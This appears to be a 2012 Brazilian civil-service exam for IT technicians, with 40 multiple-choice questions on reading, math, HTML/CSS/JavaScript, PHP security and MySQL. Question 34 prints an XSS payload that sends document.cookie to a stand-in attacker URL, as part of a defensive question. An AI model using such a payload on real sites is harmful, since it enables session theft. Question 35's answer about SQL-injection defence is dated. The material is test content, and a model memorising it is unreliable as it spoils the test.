concurso público para técnico de informática – 1a fase ... · isso ocorre também dentro do...
TRANSCRIPT
Concurso público para técnico de informática – 1a fase
Edital SCS 01/2012
Instruções gerais:
Este é seu caderno de questões. Na última página encontra-se o gabarito. Nele
você deve copiar as alternativas corretas de cada questão: apenas as respostas
copiadas no gabarito serão corrigidas.
Além deste caderno, você receberá também um segundo gabarito, solto, no
qual poderá copiar as respostas dadas e levá-las para casa.
A prova de múltipla escolha terá duração de 3 horas, contadas a partir do
momento em que o Fiscal do Concurso Público declarar o início.
Os candidatos que saírem antes de meia hora após o início da prova serão
considerados desistentes e suas provas não serão corrigidas.
Ao término das provas, os dois últimos candidatos devem sair da sala ao
mesmo tempo. Em nenhuma hipótese um único candidato poderá permanecer
sozinho na sala de prova com o Fiscal do Concurso Público.
Será excluído do concurso público, o candidato que:
não apresentar documento que o identifique no momento da prova;
ausentar-se da sala sem o acompanhamento do fiscal;
for surpreendido em comunicação com outras pessoas ou utilizando-se de
livros, notas ou impressos;
estiver portando ou fazendo uso de qualquer tipo de equipamento eletrônico de
comunicação (agendas eletrônicas, telefones celulares, pagers, laptop e outros
equipamentos similares);
não devolver integralmente o material recebido;
perturbar, de qualquer modo, a ordem dos trabalhos.
Por razões de ordem técnica, de segurança e de direitos autorais adquiridos, não serão fornecidos exemplares da prova aos candidatos, mesmo após o encerramento do Concurso Público.
Não serão computadas nesta prova as questões objetivas não assinaladas ou que contenham mais de uma resposta, emenda ou rasura, ainda que legível.
Concurso público para técnico de informática – 1a. fase
Edital SCS 01/2012
1) (TFC) Abaixo você tem cinco frases que formam o parágrafo inicial de um texto.
Ordene-as de maneira a obter um parágrafo coeso e coerente:
1) Assim também, se você decidir chamar a rosa por um outro nome, ainda assim ela
continuará sendo uma rosa.
2) Quem quiser dizer o contrário que o faça.
3) Em resumo, o nosso país é o que é.
4) Isso em nada mudará essa realidade.
5) O Brasil é um país de Terceiro Mundo.
a) 1, 2, 3, 4, 5
b) 3, 5, 1, 4, 2
c) 4, 5, 1, 2, 3
d) 5, 2, 4, 1, 3
e) 2, 4, 3, 5, 1
2) (TRE-SP) Quando conjugam três fatores – tecnologia, investimento e mercado – o
país é rico, ainda que sem recursos naturais, como é o caso do Japão ou da Noruega.
Se não se conjugam, o país pode ter recursos mas não tem riquezas, como é o caso do
Brasil e da Indonésia. Isso ocorre também dentro do mesmo país. Minas Gerais, por
exemplo, tem mais recursos minerais e menos riqueza do que São Paulo.
De acordo com o texto:
a) A conjugação dos três fatores – tecnologia, investimento e mercado – é condição
indispensável para homogeneizar a situação econômica dos diferentes países.
b) O Japão e a Noruega, assim como o Brasil e a Indonésia, igualam-se em condições
naturais de crescimento.
c) Existe uma diferença entre os recursos extraídos do solo e a riqueza provinda da
economia.
d). A coexistência da tecnologia, do investimento e do mercado garante a sustentação
dos recursos naturais.
e) Dentro do mesmo país podem ocorrer profundas diferenças na maneira de
exploração do solo.
3) (FUVEST) “O Ministério da Fazenda descobriu uma nova esperteza no Instituto de
Resseguros do Brasil. O Instituto alardeou um lucro no primeiro semestre de 3,1
bilhões de cruzeiros, que esconde na verdade um prejuízo de 2 bi. Brasil, Cuba e Costa
Rica são os três únicos países cujas empresas de resseguros são estatais.
[Veja, 1/9/93, pág. 31]
Conclui-se do texto que seu autor:
a) acredita que a esperteza do Instituto de Resseguros gerou lucro e não prejuízo.
b) dá como certo que o prejuízo do Instituto é maior do que o lucro alardeado.
c) julga que o Instituto de Resseguros agiu de boa fé.
d) dá a entender que é contrário ao fato de o Instituto de Resseguros ser estatal.
e) tem informação de que em Cuba e na Costa Rica os Institutos de Resseguros
camuflam seus prejuízos.
4) (UPE – 2012) De acordo com a tira cômica, o personagem Dilbert:
a) afirma que o telefone celular é o objeto de desejo de todas as mulheres que ele
conhece atualmente.
b) acredita que sua psicanalista, por quem ele sente atração, sabe ouvi-lo melhor que
a maioria das mulheres.
c) acha que as mulheres são, geralmente, atenciosas, embora ele não consiga se
comunicar bem com elas.
d) acha que sua psicanalista não consegue entender sua forte atração pelas mulheres
e por seu telefone celular.
e) acredita que o telefone, objeto pelo qual se diz apaixonado, tem muitas qualidades
e pode até superar as de uma mulher.
5) Leia o seguinte texto, extraído da documentação do software WordPress
(http://codex.wordpress.org/FAQ_Developer_Documentation )
Check the WordPress Plugin listing on the Plugins List on your WordPress site, or on the
WordPress Plugins Directory to determine compatibility and if updates are available. If
a WordPress Plugin update is available, it will be shown on the Dashboard Panel, an
alert on the Plugin's menu title, and on the Plugin List. Follow the instructions to
update the Plugin. If a WordPress Plugin is not compatible or updated for the next
release of WordPress, contact the Plugin author directly for information on the next
update and compatibility issues.
De acordo com o texto:
a) Todos os plugins disponíveis no site são compatíveis com todas as versões do
Wordpress.
b) Se uma atualização do plugin estiver disponível, ela vai aparecer no Painel.
c) Problemas com compatibilidade dos plugins devem ser informados à empresa
detentora dos direitos do Wordpress.
d) A instalação de plugins deve ser feita por conta e risco do usuário.
e) Os plugins instalados no Wordpress são atualizados automaticamente, sem que o
usuário perceba.
6) Leia o seguinte texto, extraído da documentação do software WordPress
(http://codex.wordpress.org/FAQ_Developer_Documentation )
Q: Why does WordPress only support MySQL? What about DB abstraction?
A: While in theory supporting more databases is better than supporting one, in
practice focusing on MySQL has a number of benefits.
First, introducing support for databases other than MySQL would increase the testing
load for all development quite a bit, as already the combinations of PHP versions, web
servers like Apache, Lighttpd, and IIS, and Windows vs Linux cause a number of issues,
multiplying that by an arbitrary number of database platforms is daunting.
Early on in WordPress' history when DB abstraction was seriously considered we
noticed packages like AdoDB were bigger than WordPress itself, which seemed like a
lot of weight for little gain.
DB independence also requires far more than just dropping in a DB abstraction class,
as basic assumptions WP makes about things like primary keys, indicies, auto
incrementing fields, LIMITs, and more vary more from DB to DB than a class could
support without serious code changes.
Finally, MySQL is ubiquitous and has shown to be fast enough and scalable enough for
the highest traffic loads, so supporting other DBs would not improve the WordPress
experience or our popularity much. As a feature request it comes up fairly infrequently.
Baseado no texto acima, assinale a afirmação correta
a) Wordpress pode ser usado com vários bancos de dados, inclusive MySQL
b) Wordpress implementa uma camada de abstração de acesso ao banco de dados
que permite o uso de vários bancos de dados.
c) O MySQL é o único banco de dados rápido e escalável suficiente para atender as
demandas do Wordpress.
d) Uma das razões de focar no MySQL como banco de dados para WordPress é que
facilita o processo de testes e controle de qualidade.
e) Wordpress terá suporte para bases de dados além de MySQL por meio de
combinações de versões de PHP e servidores Web como Apache, Lighttpd e ISS.
7) Um aplicativo Web insere uma linha por "pageview" numa tabela do Banco de
Dados. Se cada linha ocupa 20 bytes e o serviço atende 10.000 pageviews por dia, em
quanto tempo o tamanho desta tabela atinge 1 Gbyte?
a) 200 dias
b) 5000 dias
c) 500 dias
d) 20 dias
e) 1 dia
8) (ENEM 2010) Uma empresa possui um sistema de controle de qualidade que
classifica o seu desempenho financeiro anual, tendo como base o do ano anterior. Os
conceitos são: insuficiente, quando o crescimento é menor que 1%; regular, quando
o crescimento é maior ou igual a 1% e menor que 5%; bom, quando o crescimento é
maior ou igual a 5% e menor que 10%; ótimo, quando é maior ou igual a 10% e
menor que 20%; e excelente, quando é maior ou igual a 20%.
Essa empresa apresentou lucro de R$ 132 000,00 em 2008 e de R$ 145 000,00 em
2009.
De acordo com esse sistema de controle de qualidade, o desempenho financeiro dessa
empresa no ano 2009 deve ser considerado:
a) insuficiente
b) regular.
c) bom.
d) ótimo.
e) excelente.
9) (ENEM 2010) Um grupo de pacientes com Hepatite C foi submetido a um
tratamento tradicional em que 40% desses pacientes foram completamente curados.
Os pacientes que não obtiveram cura foram distribuídos em dois grupos de mesma
quantidade e submetidos a dois tratamentos inovadores. No primeiro tratamento
inovador, 35% dos pacientes foram curados e, no segundo, 45%. Em relação aos
pacientes submetidos inicialmente, os tratamentos inovadores proporcionaram cura
de:
a) 16%
b) 24%
c) 32%
d) 48%
e) 64%
10) (ENEM 2011) Nos últimos cinco anos, 32 mil mulheres de 20 a 24 anos foram
internadas nos hospitais do SUS por causa de AVC. Entre os homens da mesma faixa
etária, houve 28 mil internações pelo mesmo motivo.
[Época, 26 abr. 2010 (adaptado)]
Suponha que, nos próximos cinco anos, haja um acréscimo de 8 mil internações de
mulheres e que o acréscimo de internações de homens por AVC ocorra na mesma
proporção.
De acordo com as informações dadas, o número de homens que seriam internados por
AVC nos próximos cinco anos, corresponderia a:
a) 4 mil
b) 9 mil
c) 21 mil
d) 35 mil
e) 39 mil
11) Qual das afirmações abaixo sobre a especificação do HTML 5 é falsa?
a) O processamento de páginas é mais rígido e os navegadores não devem apresentar
a página em caso de erro de sintaxe, sendo nesse caso exibida uma mensagem de
erro padronizada.
b) A tag <video> possibilita a apresentação de vídeos em páginas.
c) O uso de eventos de Javascript padronizados possibilita a implementação de
arrastar e soltar (drag and drop) elementos HTML.
d) A API WebSocket possibilita comunicação em duas vias na mesma conexão entre
navegador e servidor, apresentando vantagens sobre o uso de técnicas como Ajax e
Comet.
e) A tag <canvas> possibilita a criação de desenhos e animações direto na página.
12) Qual regra da sintaxe XML não está sendo observada no código abaixo:
<?xml version="1.0"?>
<empresa CNPJ="51478691000115">
<dados>
<razaosocial>Papelaria YXZ</dados>
</razaosocial>
</empresa>
a) Nem todas as tags abertas estão fechadas.
b) Tags não podem estar fora de ordem.
c) Existe mais de um elemento raiz.
d) Não estão sendo preservados os espaços de linha entre as tags.
e) Os comentários estão formatados incorretamente.
13) O DNS reverso é utilizado para:
a) encontrar o nome e domínio de um computador na rede.
b) encontrar o domínio de um computador na rede.
c) encontrar o endereço IP de um computador na rede.
d) encontrar o endereço IP de um computador e suas configurações de firewall.
e) encontrar o endereço IP de um computador na rede, desde que esteja ligado.
14) Especialistas em tecnologia da Web se referem frequentemente à "separação
entre estrutura e apresentação". Qual das seguintes tecnologias se refere à
exclusivamente a apresentação de páginas na Web?
a) PHP
b) HTML
c) CSS
d) Java
e) Python
15) Considere as seguintes tecnologias:
A. Flash
B. Javascript
C. PHP
D. HTML
E. CSS
No modelo de computação denominado "cliente - servidor", quais dos códigos feitos
com as tecnologias acima podem ser executados no cliente?
a) D e E
b) B e D
c) A, B, C e E
d) B, D e E,
e) A, B, D, E
16) Aponte a diferença mais importante entre sistemas de versionamento de código
modernos (Git, Mercurial) e os sistemas mais antigos (CVS, Subversion):
a) os sistemas modernos suportam arquivos binários.
b) os sistemas modernos são muito mais rápidos.
c) os sistemas modernos permitem cada desenvolvedor trabalhar na sua própria
versão do código.
d) os sistemas modernos permitem colaboração entre desenvolvedores sem
necessidade de um repositório central (x).
e) os sistemas antigos guardam a história das revisões somente localmente.
17) Analise o trecho de algoritmo a seguir, em pseudocódigo:
Atribuir BRASIL-2014 a STR;
Atribuir 35 a GAMA
Atribuir 0 a BETA
Repetir
(se resto da divisão de GAMA por 2 igual a 1)
então imprimir STR;
Atribuir GAMA-7 a GAMA;
Se GAMA igual a 7 então atribuir 1 a BETA;
Até que BETA igual a 1;
Após a execução, o conteúdo da variável STR será impressa uma quantidade de vezes
igual a:
a) 0
b) 1
c) 2
d) 3
e) 4
18) Dado o programa abaixo, escrito em uma linguagem orientada a objetos, ao
passar como argumento uma instância da classe B para o método m3 de um objeto da
classe A, qual o resultado?
class A {
void m1() { /* faz alguma coisa */ }
void m2() { /* faz alguma coisa */ }
void m3(A x) { x.m1(); }
}
class B extends A {
void m0() { /* faz alguma coisa */ }
void m1() { /* faz alguma coisa */ }
}
a) Ocorrerá um erro de compilação.
b) Ocorrerá um erro em tempo de execução.
c) Será executado o código do método m1 definido na classe A.
d) Será executado o código do método m1 definido na classe B.
e) Serão executados os códigos dos métodos m1 definidos nas classes A e B, nessa
ordem.
19) Duas formas muito comuns de integração de sistemas distribuídos é o uso de
padrões WS-* e do padrão arquitetural REST. Comparando os dois tipos de padrão,
quais afirmações são verdadeiras?
I - As interfaces de Serviços Web WS-* são definidas usando WSDL, enquanto REST usa
uma interface uniforme, constituída pelos métodos definidos na especificação HTTP
II - O mecanismo de falhas em Serviços Web WS-* é definido na especificação SOAP,
enquanto REST usa os códigos de erro 4xx e 5xx definidos na especificação HTTP
III - Comunicação segura em serviços web WS-* é especificada por padrões como WS-
Security, WS-Trust, entre outros, enquanto REST usa HTTPS
a) I
b) II
c) III
d) II e III
e) I, II e III
20) Qual a formatação correta para definir o maior título (heading) em html?
a) <head>
b) <heading>
c) <h1>
d) <header>
e) <h6>
21) Qual a maneira correta para se fazer um hiperlink:
a) <a name="http://www.usp.br">www.usp.br</a>
b) <a>http://www.usp.br</a>
c) <a href="http://www.usp.br">usp.br</a>
d) <a url="http://www.usp.br">www.usp.br</a>
e) <a href="site://www.usp.br">usp.br</a>
22) Qual a formatação correta para ter um campo de texto no formulário (text field):
a) <input type="textfield" />
b) <textfield>
c) <input type="text" />
d) <textinput type="text" />
e) <textarea>
23) Qual o local correto no código HTML para inserir a referência externa a folha de
estilo CSS:
a) Ao final do html
b) Dentro da tag <body>
c) No topo do html
d) Dentro da tag <head>
e) Em qualquer lugar do html
24) Uma das maneiras práticas de se escrever uma folha de estilo (css) para que só o
navegador (browser) Internet Explorer entenda é:
a) <link rel="stylesheet" type="text/css" media="all" href="ie.css"/>
b) <link rel="stylesheet-for-IE" type="text/css" media="all" href="ie.css"/>
c) <!--[if IE]><link rel="stylesheet" type="text/css" media="all" href="ie.css"/><!
[endif]-->
d) [if IE]<link rel="stylesheet" type="text/css" media="all" href="ie.css"/>[endif]
e) Isso não é possível de ser feito.
25) Como adicionar uma cor de background para todos os elementos <h3>?
a) h3.all {background-color:#cccccc;}
b) all.h3 {background-color:#cccccc;}
c) h3 {background-color:#cccccc;}
d) for.h3.all {background-color:#cccccc;}
e) for.h3 {background-color:#cccccc;}
26) Aproveitando-se de boas práticas e otimização de códigos CSS, qual seria a
melhor maneira de deixar os seguintes elementos body, h1, h2 e p com margem 0?
a) .body .h1.h2 .p { margin:0 0 0 0; }
b) body h1 h2 p { margin:0px; }
c) (body h1 h2 p){ margin:0px; }
d) body,h1,h2,p { margin:0px; }
e) .body .h1.h2 .p { margin:0px; }
27) Pseudo-classes CSS são utilizadas para melhorar o controle do CSS sem que você
precise utilizar qualquer recurso de programação para modificar algum seletor
específico do CSS. No caso abaixo temos um exemplo:
<style>
div > p:first-child{
color: red;
}
</style>
E o seguinte html:
<body>
<p>O primeiro P fora de uma div.</p>
<div>
<p>O primeiro P dentro da div</p>
<p>O segundo P dentro da div</p>
<p>O terceiro P dentro da div</p>
</div>
<p>O último P fora da div</p>
</body>
Qual o resultado esperado?
a) Todos os P devem aparecer em vermelho;
b) Apenas os P dentro da DIV devem aparecer em vermelho;
c) O primeiro P fora da DIV fica em vermelho;
d) O primeiro P dentro da DIV fica em vermelho;
e) O último P fora da DIV fica em vermelho;
28) Tratando-se da linguagem JavaScript, vejamos as expressões abaixo:
A) x = "A resposta é " + 42 // retorna "A resposta é 42"
B) "37" - 7 // retorna 30
C) "37" + 7 // retorna "377"
Quais são as respostas certas?
a) Apenas a resposta A
b) Apenas a resposta B
c) Apenas a resposta C
d) As respostas A e B
e) Todas estão certas
29) Dentro de qual elemento HTML devem ser colocados os códigos JavaScript?
a) <scripting>
b) <js>
c) <javascript>
d) <script>
e) <Java Script>
30) Abaixo temos uma simples página HTML com a utilização do script Jquery:
<html>
<head>
<title>Minha página</title>
<script type="text/javascript" charset="utf-8">
function sayHello() {
$('#foo').text('Olá mundo!');
}
</script>
</head>
<body>
<h1 id="foo" onclick="sayHello()">Clique aqui!</h1>
</body>
</html>
Porém o console de erro do navegador apresenta a seguinte mensagem: Error: $ is not
defined e nada acontece porque:
a) Não foi carregada a biblioteca Jquery na página
b) A sintaxe da função está errada
c) Não foi declarado que esse é um script Jquery
d) O type do script deveria ser type="text/JQuery"
d) Todas as opções estão certas
31) A Intel produziu o seguinte infográfico mostrando o que acontece em 1 minuto na internet:
Qual alternativa é falsa?
a) Atualmente o número de devices conectado a internet é igual a população global
atual
b) O YouTube é o site atual mais importante da internet
c) Em 2015 o número de devices conectados a internet será 2 vezes o valor da
população global
d) Mais de 2 milhões de buscas são feitas no Google
e) 639.800 GB de dados são transferidos em 1 minuto
32) Considere um servidor web com interpretador php configurado corretamente e
com todos os arquivos do site em php no diretório de trabalho do servidor web.
Geralmente os sistemas em php possuem arquivos usados exclusivamente para
configurar parâmetros do programa, como a conexão ao banco de dados, esses
arquivos costumam ser incluídos no código com chamadas as funções include() ou
require(). Sob o ponto de vista da segurança do sistema qual é a extensão mais
adequada para os arquivos que serão incluídos pelas funções anteriormente citadas,
sempre visando não mostrar o código fonte que contém os parâmetros?
a) .inc
b) .include
c) .php
d) .sphp
e) .phphtml
33) Considere a seguinte árvore de diretórios em um servidor web:
-diretorio_de_sistema
-log
|- conf
|- include
|- lib
|- www
O diretório de trabalho do servidor web é o www. Em qual diretório informações
confidenciais como o arquivo de configuração do banco de dados, que contém nome
de usuário, senha e endereço do servidor de banco de dados, estarão menos
protegidas?
a) www
b) lib
c) conf
d) include
e) log
34) Um formulário possui uma área de texto que é recebida em php pelo seguinte
código:
$mensagem = isset($_POST[“areatexto”]) ? $_POST[“areatexto”] : NULL;
Esse formulário está publicado na internet e um usuário qualquer digita a seguinte
mensgem na área de texto:
<script>
document.location = 'http://sitemau.com/pegacookie.php?cookies=' +
document.cookie
</script>
Esse tipo de ataque pode ser evitado utilizando-se uma função interna do php, qual é?
a) htmlspecialchars
b) trim
c) addbackslashs
d) implode
e) html_entity_decode
35) Várias técnicas de programação podem contribuir para evitar a injeção de código
em bancos de dados, esses ataques costumamos chamar de sql injection, em php
podemos minimizar esse tipo de ataque utilizando qual função interna no tratamento
das variáveis de entrada?
a) explode
b) stripslashes
c) addslashes
d) nl2br
e) sql_regcase
36) Atualmente as aplicações web utilizam intensivamente SGBDR com SQL. É boa
prática otimizar as consultas aumentando assim a velocidade que os dados retornam
e consumindo a menor quantidade possível de recursos do servidor de banco de
dados. Como podemos otimizar consultas tipo SELECT ?
a) Utilizando-se o * como chave de busca no SELECT
b) Criando índices ( INDEX ) entre as referências das diferentes tabelas
c) Utilizando EXPLAIN na execução do SELECT
d) Utilizando-se SHOW TABLE STATUS nas diferentes tabelas da consulta
e) Utilizando CHECK TABLE
37) Ao deletarmos uma grande parte de uma tabela ou se fizermos muitas mudanças
em uma tabela que possua linhas de tamanhos variáveis ( aquelas com colunas
varchar, varbinary, blob ou text ) podemos recuperar o espaço não usado e
desfragmentar os arquivos de dados, melhorando assim o desempenho das próximas
operações na tabela. Qual comando devemos utilizar para isso ?
a) OPTIMIZE TABLE
b) REPAIR TABLE
c) ANALYZE TABLE
d) SHOW PROCESSLIST
e) RESTORE TABLE
38) Indique qual é a forma de ser fazer backup do MySQL garantindo a maior
portabilidade entre sistemas operacionais distintos e também entre versões de MySQL
diferentes:
a) Cópia dos arquivos de dados ( .frm, .MYD e .MYI ) do MySQL
b) Cópia do pool innodb
c) Cópia do último log binário do MySQL
d) Não há cópia portável entre sistemas operacionais diferentes
e) Efetuar um despejo da base
39) O programa a seguir foi escrito em pseudocódigo, o ele que faz?
Inicio
real numero1 , numero2 , numero3 , resultado
escrever "Digite o numero1:"
ler numero1
escrever "Digite o numero2:"
ler numero2
escrever "Digite o numero3:"
ler numero3
resultado <- ( numero1 + numero2 + numero3 ) / 3
escrever "Resultado: " , resultado
fim
a) Calcula uma diferença de datas
b) Calcula a aceleração de uma massa
c) Calcula a média aritmética de três números reais
d) Calcula a média aritmética de três número inteiros
e) Calcula a média harmônica de três números
40) O cálculo do índice de massa corporal é:
IMC=Ph2
onde P é o seu peso, um número Real, em Kg e h, um número Real, é a altura em m.
Qual algoritmo, escrito em pseudocódigo, calcula corretamente o IMC?
a)
inicio
real massa , altura , imc
escrever "Digite o seu peso na Terra ( Kg ):"
ler massa
escrever "Digite a sua altura ( m ):"
ler altura
imc <- ( massa / ( altura ^ 2 ) )
escrever "IMC: " , imc
fim
b)
inicio
real massa , altura , imc
escrever "Digite o seu peso na Terra ( Kg ):"
ler massa
escrever "Digite a sua altura ( m ):"
ler altura
imc <- ( massa / ( altura * 2 ) )
escrever "IMC: " , imc
fim
c)
inicio
real massa , altura , imc
escrever "Digite o seu peso na Terra ( Kg ):"
ler massa
escrever "Digite a sua altura ( m ):"
ler altura
imc <- ( massa / 2 ^ altura )
escrever "IMC: " , imc
fim
d)
inicio
real massa , altura , imc
escrever "Digite o seu peso na Terra ( Kg ):"
ler massa
escrever "Digite a sua altura ( m ):"
ler altura
imc <- ( altura / massa ^ 2 )
escrever "IMC: " , imc
fim
e)
inicio
real massa , altura , imc
escrever "Digite o seu peso na Terra ( Kg ):"
ler massa
escrever "Digite a sua altura ( m ):"
ler altura
imc <- ( altura / 2 ^ massa )
escrever "IMC: " , imc
fim
Concurso público para técnico de informática – 1a fase
Edital SCS 01/2012
Gabarito
Esta folha deve ser devolvida com a prova. Só serão corrigidas as questões
assinaladas aqui.
Questão alternativa Questão Alternativa
1 21
2 22
3 23
4 24
5 25
6 26
7 27
8 28
9 29
10 30
11 31
12 32
13 33
14 34
15 35
16 36
17 37
18 38
19 39
20 40
Nome: ___________________________________________
Assinatura: ___________________________________________